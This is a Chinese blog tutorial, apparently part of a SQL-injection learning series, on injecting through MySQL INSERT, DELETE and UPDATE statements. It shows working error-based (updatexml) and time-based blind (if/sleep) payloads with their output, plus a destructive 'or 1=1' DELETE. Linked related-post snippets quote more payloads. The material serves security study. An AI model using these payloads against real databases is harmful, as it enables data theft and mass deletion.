SQL注入学习之insert,delete,update注入(九)_mysql insert 报错注入

于 2025-02-10 10:30:40 发布
阅读量307 收藏 3
点赞数 10
文章标签: sql 学习 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2501_90433086/article/details/145544489
版权

0x00 简介

insert,delete,update 主要是用到盲注和报错注入,此类注入点不建议使用sqlmap等工具,会造成大量垃圾数据,和其他情况。

0x01 insert,delete,update

insert

可以看到假如没闭合是会产生很多垃圾数据的,所以这类注入建议手工或者自己写工具。

一般这种注入会出现在 注册、ip头、留言板等等需要写入数据的地方,同时这种注入不报错一般较难发现。

  1. 报错
mysql> insert into admin (id,username,password) values (2,"or updatexml(1,concat(0x7e,(version())),0) or","admin");
Query OK, 1 row affected (0.00 sec)

mysql> select * from admin;
+------+-----------------------------------------------+----------+
| id   | username                                      | password |
+------+-----------------------------------------------+----------+
|    1 | admin                                         | admin    |
|    1 | and 1=1                                       | admin    |
|    2 | or updatexml(1,concat(0x7e,(version())),0) or | admin    |
+------+-----------------------------------------------+----------+
3 rows in set (0.00 sec)

mysql> insert into admin (id,username,password) values (2,""or updatexml(1,concat(0x7e,(version())),0) or"","admin");
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53'
  1. 盲注

int型 可以使用 运算符 比如 加减乘除 and or 异或 移位等等

mysql> insert into admin values (2+if((substr((select user()),1,1)='r'),sleep(5),1),'1',"admin");
Query OK, 1 row affected (5.00 sec)

mysql> insert into admin values (2+if((substr((select user()),1,1)='p'),sleep(5),1),'1',"admin");
Query OK, 1 row affected (0.00 sec)

字符型注意闭合不能使用and

mysql> insert into admin values (2,''+if((substr((select user()),1,1)='p'),sleep(5),1)+'',"admin");
Query OK, 1 row affected (0.00 sec)

mysql> insert into admin values (2,''+if((substr((select user()),1,1)='r'),sleep(5),1)+'',"admin");
Query OK, 1 row affected (5.01 sec)

注意盲注产生大量垃圾数据。

delete

报错注入同上

值得注意的时delete 注入很危险,很危险,很危险。

语句不当 将会亲人泪两行 or 1=1 因为 1=1 为true 所以每一行被删除了, 他以前用sqlmap一把梭 现在过的很好,每顿都有人送饭到手上。

所以在 delete注入时使用 or 一定要为false

mysql> delete from admin where id =3 or 1=1;
Query OK, 4 rows affected (0.00 sec)

报错注入

mysql> delete from admin where id =-2 or updatexml(1,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53'

盲注

or 配上 if() 函数使用不当 再提下 if(expr1,expr2,expr3),如果expr1的值为true,返回expr2的值,如果expr1的值为false,
返回expr3的值。

mysql> delete from admin where id =-2 or if((substr((select user()),1,1)='r4'),sleep(5),1);
Query OK, 3 rows affected (0.00 sec)

所以 delete中 or 的正确使用方法 (or 右边要为false)

mysql> delete from admin where id =-2 or if((substr((select user()),1,1)='r4'),sleep(5),0);
Query OK, 0 rows affected (0.00 sec)

mysql> delete from admin where id =-2 or if((substr((select user()),1,1)='r'),sleep(5),0);
Query OK, 0 rows affected (5.00 sec)
update

与上面的类似

大厂_jvS
关注
针对INSERT语句SQL注入
qq_69100706的博客
07-30 931
在CTF(Capture The Flag)竞赛中,针对INSERT语句SQL注入是一种利用Web应用程序逻辑漏洞的技术,主要发生在应用程序接收用户输入并将其插入到数据库中时。如果应用程序没有正确地清理或参数化这些输入,攻击者可以注入恶意SQL代码,从而操纵数据库插入操作,甚至执行其他SQL命令。
mysql insert 注入_SQLMap Insert注入踩坑记
weixin_39773239的博客
02-01 1201
*本文原创作者:Conan,本文属 FreeBuf 原创奖励计划,未经许可禁止转载前言本篇文章是在做ctf bugku的一道sql insert盲注的题(题目地址:insert盲注)中踩到的坑,觉得还挺有趣的,于是便有了今天的文章,如有纰漏还望大佬们多多指正。进入主题1. 判断注入点明显的insert类型的注入注入点在X-Forwarded-For,但关闭了错误提示并且没有回显,因此只能进行时间...
SQL注入 (中级篇)Insert注入
热门推荐
weixin_41472455的博客
05-14 6万+
insert注入: 其实对于初学SQL注入,并不需要区分注入类型。 但是要理解insert注入,首先需要理解SQLinsert语句 举个例子 :在Student表插入bob的信息 Student表: |-----------------------------------| | name | age | grade | |-----------------------------------| | andy | 14 | 98 | ...
mysql insert 注入_MysqlInsertUpdateDelete、Order By、Group By注入
weixin_42376118的博客
01-19 301
Insert:语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....)报错注入insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '', 'Nervo');insert into te...
SQL注入_insert&delete&update&selete
weixin_48131633的博客
10-26 5490
SQL注入_insert&delete&update&selete
SQL注入UPDATEinsertdelete注入
07-08 3809
SQL注入
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
MySQL开发():基础查询操作:SELECT、INSERTUPDATEDELETE
最新发布
一名热衷于技术的全栈开发者,专注于前端与后端的全面技术探索。在这里,我将分享我在技术领域的学习与成长,助力更多开发者的进步。
10-27 1165
MySQL 的基础查询操作是每个开发者必备的技能。通过掌握SELECTINSERTUPDATEDELETE的用法,可以有效地管理数据库中的数据。本文提供了详细的示例和表格,希望对您的 MySQL 学习之旅有所帮助。
MySQL数据库的SQL注入漏洞解析
CoffeMilk的博客
09-07 1479
SQL注入总结起来就是:没有对用户输入提交的数据内容的合法性进行严格的判断或过滤,就直接将这些伪造的数据内容带入到数据库执行,导致数据泄露或损坏,甚至导致完全接管主机的一种安全漏洞。
MySQL数据库之DML数据操纵语言(insertdeleteupdate
Sheenky的博客
04-07 7755
一、数据库插入语句insert DML数据操纵中的插入语句insert,是对数据库中表数据插入数据所用的语句,它的组成是由insert into 表名称 需要插入列名(字段名) 对应字段的数据。 数据库插入语句重点事项: (1)插入的数据条数可以是多条,每条数据用(),()隔开,例如:('张三','男',23,'老师'),('李四','女',20,'学生'),... (2)插入的每条数据中含有的变量个数要与对应插入列的列名个数相同,例如;insert into table(name,gender,a
SQL注入】小白手把手入门SQL注入1-数据库基础
记录并分享学习安全的知识点..
02-18 1272
数据库是“按照数据结构来组织、存储和管理数据的仓库”。是一个长期存储在计算机内的、有组织的、可共享的、统一管理的大量数据的集合。关系型数据库关系型数据库是基于关系模型的数据库系统,使用表格(表)来组织数据。数据以行和列的形式存储在表中,每个表代表一个实体或关系,每一行表示一个数据记录,每一列表示记录的属性。关系型数据库使用结构化查询语言(SQL)进行数据的查询和操作。关系型数据库中表与表之间是有很多复杂的关联关系的常见的关系型数据库有等。非关系型数据库。
mysql insert 注入_InsertUpdateSQL注入的实践之旅
weixin_35696092的博客
01-19 292
1.有回显注入int型注入点和字符型都采用按位或|和按位异或^获取数据。如果拼接的值为0,可以采用按位或|运算显示查询到的数据,如果拼接的值不是0(以100为例),可以采用按位异或^运算显示运算后的数据,然后再异或一次可以恢复查询的数据。注意查询到的数据经过hex转换,如果值大于Mysql bigint 最大值9223372036854775807时,获取到的数据均为922337203685477...
记一次注册功能处Mysql手工报错注入
qq_36270253的博客
04-01 4234
记一次注册功能处Mysql手工报错注入 知识点:报错注入是使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息,比如select/insert/update/delete都可以使用报错来获取信息,报错注入的使用前提条件,是后台没有屏蔽数据库的报错信息,在语法发生错误的时候会显示在客户前端页面。 /////////分////////////割/////////\\\\\\线\\\\\\\\\\\ 安卓app除了反编译apk外,各功能点也有几率存在漏洞,甚至攻防演练的时候也可以从app资产寻找突破口。
MySQL注入总结
dteer的博客
04-02 488
目录:0x00 mysql一般注入(select)0x01 mysql一般注入(insertupdate)0x02 mysql报错注入0x03 mysql一般盲注0x04 mysql时间盲注0x05 mysql其他注入技巧0x06 mysql数据库版本特性0x07 声明正文:0x00 mysql一般注入(select)1.注释符#/*--2.过滤空格注入使用/**/或()或+代替空格%0c = ...
mysql insert sql注入_利用insertupdatedelete注入获得数据
weixin_39571749的博客
02-03 696
前言最近在进行代码审计,其中遇到了update、delte语句存在注入的问题就找来了这篇文章看看,同时也加强以下自己对报错注入的理解。以下是文章原文。如果不想看原文,可以直接看文章最后的我的总结一章。本文转载自wooyun drops文章,《利用insertupdatedelete注入获得数据》。以下是文章原文,如有侵权,望告知。简介利用SQL注入注入获取数据库数据,利用的方法可以大致分为联合...
8.SQL注入-基于insert,update利用案例
愿听风成曲
07-03 1236
sql语句正常插入表中的数据例如插入小强数据,如图所示:采用or这个运算符,构造闭合语句‘xiaoqinag’ or __ or 中后面的那个or后的单引号是为了闭合掉语句后面本身带有的单引号。而前面第一个or后是我们要填的注入语句。这里还是用后台报错的方法来构造payload,且有必要提到的是,这里我们还用的了updatexmal()基于insert语句下的报错:暴库payload语句
mysql insert 注入_mysql,insert登陆框注入思路,(未完)
weixin_33444829的博客
01-19 376
admin','111 or 1=1',1376194991,0,'218.121.111.35',concat(@@version))#concat((select (select (update manager_login set userPasswd = 111111 where userName = admin)) from information_schema.tables limit ...
mysql注入执行insert_利用insertupdatedelete注入获取数据_MySQL - insert
weixin_39646725的博客
01-28 266
.../code>)) ENGINE=MyISAM AUTO_INCREMENT=25 DEFAULT CHARSET=utf8INSERT INTO test VALUES (1, '2015-7-1', 'test_1');INSERT INTO test VALUES (2, '2015-7-1', 'test_2');INSERT INTO test VALUES (3, '2015...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值